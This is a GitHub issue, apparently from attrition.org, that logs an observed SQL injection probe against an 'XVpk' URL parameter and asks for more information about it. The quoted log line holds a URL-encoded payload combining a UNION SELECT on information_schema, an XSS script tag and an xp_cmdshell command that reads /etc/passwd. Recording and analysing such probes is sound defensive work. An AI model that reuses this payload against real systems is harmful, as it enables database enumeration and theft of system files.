Skip to content

GET / XVpk Parameter SQL Injection #80

New issue
New issue
Open
Open
GET / XVpk Parameter SQL Injection#80
Labels
Need More InfoFurther information is requested
@attritionorg

Description

@attritionorg
attritionorg
opened on Feb 3, 2026

149.50.108.96 (149.50.108.96) - - [17/Nov/2025:23:38:59 -0700] "GET /?sessid=07830F56-7776-FFFF-FFFF-535997970533&XVpk=3025%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 2825 "https://attrition.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"

https://www.google.com/search?q=%22XVpk%22+sql+injection&oq=%22XVpk%22+sql+injection - Five hits, nothing relevant.

Metadata

Metadata

Assignees

No one assigned

    Labels

    Need More InfoFurther information is requested

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions